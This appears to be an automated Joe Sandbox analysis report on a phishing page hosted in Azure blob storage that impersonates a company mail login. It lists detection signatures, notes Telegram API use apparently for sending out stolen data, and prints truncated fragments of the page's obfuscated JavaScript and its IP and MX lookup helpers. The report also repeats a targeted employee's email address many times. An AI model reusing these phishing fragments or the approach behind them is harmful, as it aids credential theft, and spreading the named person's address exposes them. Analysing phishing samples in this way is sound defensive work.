Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com

Overview

General Information

Sample URL:https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8
Analysis ID:1571602
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML page contains obfuscated javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
HTML body contains low number of good links
HTML title does not match URL
Invalid 'copyright' link found
Invalid 'forgot password' link found
Javascript checks online IP of machine
Stores files to the Windows start menu directory
URL contains potential PII (phishing indication)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1944,i,10635967694497959874,8854077005890642596,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_105JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        1.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          1.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
            2.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
              Click to see the 1 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: Yara matchFile source: 1.0.pages.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 2.4.pages.csv, type: HTML
              Source: Yara matchFile source: 2.5.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_105, type: DROPPED
              Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://copilotse.blob.core.windows.net/$web/hgyxx... High risk due to multiple suspicious indicators: heavy obfuscation (encoded variable names and strings), URL manipulation and base64 handling, DOM manipulation, and potential data exfiltration (collecting email and browser data). The code appears to be part of a credential harvesting or phishing operation.
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3*(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6*(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8*(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa*(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3*(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6*(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8*(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa*(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3*(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6*(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8*(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa*(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3*(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6*(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8*(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa*(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: Number of links: 0
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: Number of links: 0
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: Title: Phillyshipyard - Mail does not match URL
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: Title: does not match URL
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: Invalid link: Copyright 2024
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: Invalid link: Copyright 2024
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: Invalid link: Forgot password?
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: Invalid link: Forgot password?
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: function handlebase64data(string) { try { return atob(string); } catch (error) { return string; } } function getvisitorip() { return new promise(function (resolve, reject) { var xhr = new xmlhttprequest(); xhr.open('get', 'https://ipinfo.io/json', true); xhr.onload = function () { if (xhr.status >= 200 && xhr.status < 300) { var response = json.parse(xhr.responsetext); resolve(response); } else { reject('failed to fetch ip address'); } }; xhr.onerror = function () { reject('failed to fetch ip address'); }; xhr.send(); }); } async function getmxrecord(domain) { try { const response = await fetch(`https://dns.google/resolve?name=${domain}&type=mx`); const data = await response.json(); if (data && data.answer && data.answer.length > 0) { const mxrecords = data.an...
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: function handlebase64data(string) { try { return atob(string); } catch (error) { return string; } } function getvisitorip() { return new promise(function (resolve, reject) { var xhr = new xmlhttprequest(); xhr.open('get', 'https://ipinfo.io/json', true); xhr.onload = function () { if (xhr.status >= 200 && xhr.status < 300) { var response = json.parse(xhr.responsetext); resolve(response); } else { reject('failed to fetch ip address'); } }; xhr.onerror = function () { reject('failed to fetch ip address'); }; xhr.send(); }); } async function getmxrecord(domain) { try { const response = await fetch(`https://dns.google/resolve?name=${domain}&type=mx`); const data = await response.json(); if (data && data.answer && data.answer.length > 0) { const mxrecords = data.an...
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comSample URL: PII: robert.webber@phillyshipyard.com
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: <input type="password" .../> found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: <input type="password" .../> found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: No <meta name="author".. found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: No <meta name="author".. found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: No <meta name="author".. found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: No <meta name="author".. found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: No <meta name="author".. found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: No <meta name="copyright".. found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: No <meta name="copyright".. found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: No <meta name="copyright".. found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comHTTP Parser: No <meta name="copyright".. found
              Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#HTTP Parser: No <meta name="copyright".. found
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49754 version: TLS 1.2

              Networking

              barindex
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
